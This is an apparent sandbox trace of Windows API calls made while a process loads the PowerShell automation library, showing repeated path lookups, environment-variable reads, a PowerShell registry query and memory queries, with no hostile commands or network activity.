	[0430.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.776] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0430.776] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0430.776] CoTaskMemFree (pv=0x290510) 
	[0430.776] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0430.776] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0430.776] CoTaskMemFree (pv=0x290510) 
	[0430.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.778] GetCurrentProcessId () returned 0xc20
	[0430.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.782] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18db98 | out: phkResult=0x18db98*=0x360) returned 0x0
	[0430.783] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18db1c, lpData=0x0, lpcbData=0x18db18*=0x0 | out: lpType=0x18db1c*=0x1, lpData=0x0, lpcbData=0x18db18*=0x56) returned 0x0
	[0430.783] CoTaskMemAlloc (cb=0x5a) returned 0x1b349d40
	[0430.783] RegQueryValueExW (in: hKey=0x360, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18daec, lpData=0x1b349d40, lpcbData=0x18dae8*=0x56 | out: lpType=0x18daec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18dae8*=0x56) returned 0x0
	[0430.783] CoTaskMemFree (pv=0x1b349d40) 
	[0430.783] RegCloseKey (hKey=0x360) returned 0x0
	[0430.785] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0430.785] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.785] CoTaskMemFree (pv=0x290510) 
	[0430.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.982] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0431.082] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0431.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.082] CoTaskMemFree (pv=0x290510) 
	[0431.086] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0431.094] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0431.094] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.094] CoTaskMemFree (pv=0x290510) 
	[0431.094] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0431.094] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.094] CoTaskMemFree (pv=0x290510) 
	[0431.095] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0431.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.095] CoTaskMemFree (pv=0x290510) 
	[0431.101] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0431.101] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.101] CoTaskMemFree (pv=0x290510) 
	[0431.107] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0431.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.107] CoTaskMemFree (pv=0x290510) 
	[0431.108] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0431.108] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.108] CoTaskMemFree (pv=0x290510) 
	[0431.117] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0431.120] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0431.340] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0431.364] CoTaskMemAlloc (cb=0x104) returned 0x290510
	[0431.364] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.365] CoTaskMemFree (pv=0x290510) 
	[0431.618] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x290950
	[0431.620] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x290a60
	[0432.032] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.295] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.296] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.296] VirtualQuery (in: lpAddress=0x18a640, lpBuffer=0x18b500, dwLength=0x30 | out: lpBuffer=0x18b500*(BaseAddress=0x18a000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.324] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.325] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.325] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.326] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.326] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.327] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.327] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.327] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.327] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.327] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.328] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.328] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.328] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.328] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.328] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.328] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.328] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.328] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.328] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.328] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.329] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.329] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.329] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.329] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.329] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.329] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.329] VirtualQuery (in: lpAddress=0x18bbf0, lpBuffer=0x18cab0, dwLength=0x30 | out: lpBuffer=0x18cab0*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
